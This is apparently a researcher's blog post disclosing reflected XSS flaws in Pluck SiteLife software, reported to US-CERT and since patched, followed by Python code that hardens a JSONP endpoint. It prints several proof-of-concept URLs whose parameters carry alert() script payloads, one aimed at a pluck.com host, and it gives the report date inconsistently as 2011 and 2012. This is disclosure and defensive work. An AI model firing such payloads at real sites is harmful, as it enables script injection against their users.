Pluck SiteLife software multiple XSS vulnerabilities
On November 30, 2011 I reported to US-CERT that I found multiple XSS vulnerabilities in Demand Media's Pluck SiteLife software. The details of the vulnerabilities (now patched) were published yesterday as US-CERT Vulnerability Note VU#400619.
Here's the original report I sent to US-CERT on November 30, 2012:
I would like to report multiple XSS vulnerabilities.
...Here are the vulnerability details for Pluck:
This demonstrates multiple XSS vulnerabilities in the Pluck SiteLife Software. According to a sales associate, "The SiteLife product was rolled into a broad social/community platform offering about 2.5 years ago. It's simply called Pluck now and Pluck 5 is the latest version." The version of Pluck that is exploitable is unknown by me at this time.
Here are a few of the known vulnerable URLs and URL parameters:
http://sitelife.example.host/ver1.0/Direct/Process?referrerURL=x&jsonRequest=<body%20onload=alert(1)//>
(Internet Explorer)
http://sitelife.example.host/ver1.0/Direct/jsonp.htm?r=<img%20src=x%20onerror=alert(2)//>&cb=<body%20onload=alert(1)//>
(Internet Explorer)
http://sitelife.example.host/ver1.0/sys/jsonp.app/.htm?cb=<img%20src=x%20onerror=alert(1)>&widget_path=pluck%2fuser%2fpersona%wffirstperson%2fprofile.app
In addition to the "cv", "jsonRequest", and "r" parameters, the "ctk" parameter is also vulnerable in some instances.
Here is a proof of concept affecting the pluck.com domain: http://sitelife.pluck.com/ver1.0/direct/process?referrerURL=x&jsonRequest=<body%20onload=alert(1)//>
Here are SOME of the sites that appear to be using the vulnerable SiteLife software. ...
I go on to list over 40 popular websites running Pluck SiteLife software that have the vulnerability, which I won't list here.
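The report above shows a JSONP callback parameter (cb) and the jsonRequest and r parameters being reflected unsanitized into the response. As an added example that is not Pluck's code, here is how a JSONP endpoint can be hardened against this class of reflection: the callback is allow-listed as a JavaScript identifier, the payload is JSON-escaped for a script context, and the response is labelled as script with content sniffing disabled so a browser cannot reinterpret it as HTML. The handler signature and return shape are assumptions; the `cb` parameter name is taken from the report.

```python
import json
import re

# Strict allow-list for JSONP callback names: dotted JavaScript identifiers only.
# Anything else (angle brackets, quotes, spaces, "//") is rejected outright.
_CALLBACK_RE = re.compile(r"^[A-Za-z_$][A-Za-z0-9_$]*(\.[A-Za-z_$][A-Za-z0-9_$]*)*$")


def is_safe_callback(name: str) -> bool:
    """Return True only if `name` is a plain (optionally dotted) JS identifier."""
    return bool(name) and len(name) <= 64 and _CALLBACK_RE.fullmatch(name) is not None


def _js_safe_json(data) -> str:
    # json.dumps (default ensure_ascii=True) already escapes non-ASCII such as
    # U+2028/2029, but leaves '<', '>' and '&' intact. Escape them so the body
    # can never close a script context even if a browser mis-sniffs it as HTML.
    return (json.dumps(data)
            .replace("<", "\\u003c")
            .replace(">", "\\u003e")
            .replace("&", "\\u0026"))


def jsonp_response(params: dict, data) -> tuple:
    """Build (status, headers, body) for a JSONP request.

    `params` is the parsed query string, e.g. {"cb": "handleProfile"}.
    The callback is validated before it is ever written into the body, and the
    response is labelled as script with sniffing disabled.
    (Hypothetical handler shape, not a real framework API.)
    """
    headers = {
        "Content-Type": "application/javascript; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
    }
    cb = params.get("cb", "")
    if not is_safe_callback(cb):
        # Do not echo the rejected value back; that would reintroduce the reflection.
        return 400, headers, "/* invalid callback */"
    # Leading comment blocks the response from being usable as a Flash/SWF loader.
    body = f"/**/ {cb}({_js_safe_json(data)});"
    return 200, headers, body
```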
Tomorrow, I will post an in-depth look at XSS in Ajax Web Applications and tell you why some of these vulnerabilities were Internet Explorer specific.